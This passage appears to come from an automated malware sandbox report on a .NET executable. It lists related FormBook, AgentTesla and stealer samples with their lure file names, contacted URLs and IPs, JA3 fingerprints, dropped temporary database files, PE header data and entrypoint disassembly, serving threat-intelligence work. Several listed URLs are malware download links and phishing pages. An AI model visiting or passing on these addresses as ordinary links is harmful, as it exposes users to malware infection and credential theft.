                    • filetransfer.io/data-package/khvbX8Pe/download
                    NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                    • www.ad14.fun/az6h/
                    IMG_05831_0172.exeGet hashmaliciousAzorult, PureLog StealerBrowse
                    • hqt3.shop/PL341/index.php
                    http://awqffg.newburuan2023.biz.id/next.phpGet hashmaliciousHTMLPhisherBrowse
                    • awqffg.newburuan2023.biz.id/img/popup-close.png
                    Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                    • www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu
                    QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • filetransfer.io/data-package/wKVSmV0M/download
                    DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                    • www.laske.xyz/rn94/?CP60e=Nj5TAPxx-d38Ipw0&SXm49b=ecVnvP4+gKLbyWzZxUSek1PIlioHla43BZzK8t+AR3JOod0Ogp7sAbtZt/g//Mg/fp7+iIhrSw==
                    M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                    • www.ad14.fun/az6h/?8DVHhn=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbO2WZcnCxPHeYc29EQ8CAdyBkxSGvBbrKIN7laUw7cXNgVnDuYHw=&DNnlG=PlN8o25pW6
                    Salary List.exeGet hashmaliciousFormBookBrowse
                    • www.coinwab.com/efdt/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ip-api.comSecuriteInfo.com.Program.Unwanted.5466.21892.3406.exeGet hashmaliciousUnknownBrowse
                    • 51.77.64.70
                    SecuriteInfo.com.Program.Unwanted.5466.21892.3406.exeGet hashmaliciousUnknownBrowse
                    • 51.77.64.70
                    RobloxCheats.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    Applikationsprograms.exeGet hashmaliciousGuLoaderBrowse
                    • 208.95.112.1
                    doc20240624-00073.bat.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    FC4311009.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    #U21162.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    TBN88-19062024=Devrez -Bunker Supply Tende.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    #U00d6deme onaylama.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    whatismyipaddressnow.coINQUIRY.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    Data-Sheet.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.97.3
                    Order Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.97.3
                    Purchase Order Enquiry #PO-240902.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    Purchase Order Enquiry #PO-240902.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    aou.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.97.3
                    opp.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    RFQ.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 188.114.96.3
                    14posdLrGh.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 172.67.143.245
                    icanhazip.comsetup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                    • 104.16.185.241
                    INQUIRY.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.185.241
                    Data-Sheet.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.184.241
                    Order Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.185.241
                    Hniunx426q.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWormBrowse
                    • 104.16.185.241
                    171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.185.241
                    Purchase Order Enquiry #PO-240902.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.184.241
                    Purchase Order Enquiry #PO-240902.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.185.241
                    aou.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.184.241
                    opp.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                    • 104.16.185.241

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUShttps://okta.coterra.com/enduser/report-suspicious-activity?i=eyJ6aXAiOiJERUYiLCJ2ZXIiOiIxIiwiZW5jIjoiQTI1NkdDTSIsImFsZyI6ImRpciJ9..oAwOZgaFj5J-DZXW.ofKE-ABdk34n4JIsq0KY2CCVK3lfuD4l1ta3yMD14ckRHKBwUJxrGHiZFT9C4njSsFvnWQ_hghpTov3QKqmRQP0hYVwlZSDNfSGuVzH_6vlWNswC_asd1s71JaXniZ-XQJl0zyVHWIe1ix1f7AMzS2H2SSJjWdVUKOvF1c7qpLjoBRMOLzUjxV7eKJB_D1wohy9vsirL3CVZJMqcmQ.VGaKzEODnxMjVBC5uqGP7wGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    Advice_Note_ATT04.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    http://wavebrowser.coGet hashmaliciousUnknownBrowse
                    • 104.18.30.234
                    SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                    • 104.26.12.205
                    ATT00003-ListenNow.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://u45250775.ct.sendgrid.net/ls/click?upn=u001.tFoYEKu8c3QV4dCjnENfD8xt5kmuuDSrdqsY1RaUCNHUhTAxpCf-2FkQtKBbJ888oIJWvg_M0oG0U0hSEmcy-2FDc53m2Ovj2gEU6WMOnlcvny0ZS4LdkqR8gSB-2F7PZsO7QHSVd-2FvJEy6PwnLdjJ6S5UoGaQ-2BqWA8TufxvTmFkxvPI-2BZkBgCYJOtfxBDgBQjm9Z9Nn5nVJSXlSys-2BymPhLkfKWqG7N5Z0UXiZhPgvAXtyoH-2FSc13rSPnBmkCBxWKokv0-2BFYFkGLEDuQmLC88YD2BXSQXbWw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://gitlab.com/mydocuments3/cv/-/raw/main/curriculum-vitae.vbs?inline=falseGet hashmaliciousUnknownBrowse
                    • 172.65.251.78
                    http://portal.tristate.supportGet hashmaliciousUnknownBrowse
                    • 172.66.0.145
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    CLOUDFLARENETUShttps://okta.coterra.com/enduser/report-suspicious-activity?i=eyJ6aXAiOiJERUYiLCJ2ZXIiOiIxIiwiZW5jIjoiQTI1NkdDTSIsImFsZyI6ImRpciJ9..oAwOZgaFj5J-DZXW.ofKE-ABdk34n4JIsq0KY2CCVK3lfuD4l1ta3yMD14ckRHKBwUJxrGHiZFT9C4njSsFvnWQ_hghpTov3QKqmRQP0hYVwlZSDNfSGuVzH_6vlWNswC_asd1s71JaXniZ-XQJl0zyVHWIe1ix1f7AMzS2H2SSJjWdVUKOvF1c7qpLjoBRMOLzUjxV7eKJB_D1wohy9vsirL3CVZJMqcmQ.VGaKzEODnxMjVBC5uqGP7wGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    Advice_Note_ATT04.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    http://wavebrowser.coGet hashmaliciousUnknownBrowse
                    • 104.18.30.234
                    SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                    • 104.26.12.205
                    ATT00003-ListenNow.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://u45250775.ct.sendgrid.net/ls/click?upn=u001.tFoYEKu8c3QV4dCjnENfD8xt5kmuuDSrdqsY1RaUCNHUhTAxpCf-2FkQtKBbJ888oIJWvg_M0oG0U0hSEmcy-2FDc53m2Ovj2gEU6WMOnlcvny0ZS4LdkqR8gSB-2F7PZsO7QHSVd-2FvJEy6PwnLdjJ6S5UoGaQ-2BqWA8TufxvTmFkxvPI-2BZkBgCYJOtfxBDgBQjm9Z9Nn5nVJSXlSys-2BymPhLkfKWqG7N5Z0UXiZhPgvAXtyoH-2FSc13rSPnBmkCBxWKokv0-2BFYFkGLEDuQmLC88YD2BXSQXbWw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://gitlab.com/mydocuments3/cv/-/raw/main/curriculum-vitae.vbs?inline=falseGet hashmaliciousUnknownBrowse
                    • 172.65.251.78
                    http://portal.tristate.supportGet hashmaliciousUnknownBrowse
                    • 172.66.0.145
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    CLOUDFLARENETUShttps://okta.coterra.com/enduser/report-suspicious-activity?i=eyJ6aXAiOiJERUYiLCJ2ZXIiOiIxIiwiZW5jIjoiQTI1NkdDTSIsImFsZyI6ImRpciJ9..oAwOZgaFj5J-DZXW.ofKE-ABdk34n4JIsq0KY2CCVK3lfuD4l1ta3yMD14ckRHKBwUJxrGHiZFT9C4njSsFvnWQ_hghpTov3QKqmRQP0hYVwlZSDNfSGuVzH_6vlWNswC_asd1s71JaXniZ-XQJl0zyVHWIe1ix1f7AMzS2H2SSJjWdVUKOvF1c7qpLjoBRMOLzUjxV7eKJB_D1wohy9vsirL3CVZJMqcmQ.VGaKzEODnxMjVBC5uqGP7wGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    Advice_Note_ATT04.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    http://wavebrowser.coGet hashmaliciousUnknownBrowse
                    • 104.18.30.234
                    SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                    • 104.26.12.205
                    ATT00003-ListenNow.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://u45250775.ct.sendgrid.net/ls/click?upn=u001.tFoYEKu8c3QV4dCjnENfD8xt5kmuuDSrdqsY1RaUCNHUhTAxpCf-2FkQtKBbJ888oIJWvg_M0oG0U0hSEmcy-2FDc53m2Ovj2gEU6WMOnlcvny0ZS4LdkqR8gSB-2F7PZsO7QHSVd-2FvJEy6PwnLdjJ6S5UoGaQ-2BqWA8TufxvTmFkxvPI-2BZkBgCYJOtfxBDgBQjm9Z9Nn5nVJSXlSys-2BymPhLkfKWqG7N5Z0UXiZhPgvAXtyoH-2FSc13rSPnBmkCBxWKokv0-2BFYFkGLEDuQmLC88YD2BXSQXbWw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://gitlab.com/mydocuments3/cv/-/raw/main/curriculum-vitae.vbs?inline=falseGet hashmaliciousUnknownBrowse
                    • 172.65.251.78
                    http://portal.tristate.supportGet hashmaliciousUnknownBrowse
                    • 172.66.0.145
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    TUT-ASUSRobloxCheats.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    Applikationsprograms.exeGet hashmaliciousGuLoaderBrowse
                    • 208.95.112.1
                    doc20240624-00073.bat.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    FC4311009.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    #U21162.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    TBN88-19062024=Devrez -Bunker Supply Tende.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    #U00d6deme onaylama.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    Purchase List VIXEN International 90349000 PDF.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    05af1f5ca1b87cc9cc9b25185115607dBills Paid.xlsGet hashmaliciousRemcosBrowse
                    • 188.114.96.3
                    Zahlung.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    5698.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                    • 188.114.96.3
                    A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                    • 188.114.96.3
                    PurchaseXOrderXNo.4036041334.docx.docGet hashmaliciousLokibotBrowse
                    • 188.114.96.3
                    LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                    • 188.114.96.3
                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    HSBC Customer Information.xlsGet hashmaliciousFormBookBrowse
                    • 188.114.96.3
                    36f7277af969a6947a61ae0b815907a1Copper Order List.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Copper Order List.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Bills Paid.xlsGet hashmaliciousRemcosBrowse
                    • 188.114.97.3
                    Zahlung.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    oc150019137.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    oc150019137.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Copper Order List - Technical Specification.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                    • 188.114.97.3
                    HSBC Customer Information.xlsGet hashmaliciousFormBookBrowse
                    • 188.114.97.3

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\7xwghk55.default\key3.db

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:Berkeley DB 1.85 (Hash, version 2, native byte-order)
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):1.121508608738599
                    Encrypted:false
                    SSDEEP:3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
                    MD5:1DEFC9C4F8AFC884D5714DE065F88E3D
                    SHA1:AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
                    SHA-256:6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
                    SHA-512:B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:...a.............................................................n}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp2426.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.7798653713156546
                    Encrypted:false
                    SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                    MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                    SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                    SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                    SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3D8E.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.07093764277882578
                    Encrypted:false
                    SSDEEP:12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
                    MD5:37F03D0EB1744FFEBCF26E3DB4A4280F
                    SHA1:0B120B18B36AD6A64C27D3845A5871D10568C92E
                    SHA-256:4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
                    SHA-512:49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3E8D.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                    Category:dropped
                    Size (bytes):122880
                    Entropy (8bit):1.4530338001328815
                    Encrypted:false
                    SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                    MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                    SHA1:BCF6B1893581F2420564160F784E47E91946269A
                    SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                    SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp52E1.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):1146880
                    Entropy (8bit):0.15644146423012004
                    Encrypted:false
                    SSDEEP:192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
                    MD5:E28514A583D6F83F8C67CA62CB891CA7
                    SHA1:4107934697F0891B26B16A6E0D9795271353355C
                    SHA-256:B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
                    SHA-512:BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
                    Malicious:false
                    Preview:SQLite format 3......@ .......#...............................#.................................-...}.."l..~\}.|.}M{.|az.y.zdyqx.y8w.xJviu.t.tNs.sxs.r.r.q.p.pwp.o.n.nym.mRl.l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp73AE.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):1.3870145383915669
                    Encrypted:false
                    SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                    MD5:1623709C6B2FB813984B1265C26A85F1
                    SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                    SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                    SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                    Malicious:false
                    Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp8E34.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                    Category:dropped
                    Size (bytes):122880
                    Entropy (8bit):1.4530338001328815
                    Encrypted:false
                    SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                    MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                    SHA1:BCF6B1893581F2420564160F784E47E91946269A
                    SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                    SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                    Malicious:false
                    Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpB268.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                    Category:dropped
                    Size (bytes):77824
                    Entropy (8bit):1.133993246026424
                    Encrypted:false
                    SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                    MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                    SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                    SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                    SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                    Malicious:false
                    Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpEEA8.tmp.dat

                    Download File
                    Process:C:\Users\user\Desktop\wssvZm9dNK.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                    Category:dropped
                    Size (bytes):77824
                    Entropy (8bit):1.133993246026424
                    Encrypted:false
                    SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                    MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                    SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                    SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                    SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                    Malicious:false
                    Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.393437263205704
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:wssvZm9dNK.exe
                    File size:57'856 bytes
                    MD5:2c5697f085b66bec06e28ed6d24ec606
                    SHA1:a3910a0f75b328f996983847cfdcc5df85520e98
                    SHA256:432dc35a995a5ba33b1f3887b3cc7804fcc3d5d2b1d4aec2664acaf20cb11bad
                    SHA512:6a2782f95d13973aefa99ee9503ff4c5d814ce74b20755a60dd39f25dfc5e01af5266c08e2c28eb53c0d6d4912493e3e1c02ca9d2fda3cdf3711e71a9bc0d0c9
                    SSDEEP:1536:BxBJBt804BeNBNBRdOemd4HmGECaS3JFF:BxBJBS04BeNBNBRdK2GJsF
                    TLSH:C043522DED50EA96C914F977C8F6F100C37570C76223872E6966ACBA2197727468E0FC
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............."...0.................. ........@.. .......................@............@................................

                    File Icon

                    Icon Hash:aaf3e3e3918382a0

                    Static PE Info

                    General

                    Entrypoint:0x40f5b2
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x83FE105A [Sun Mar 4 09:20:26 2040 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
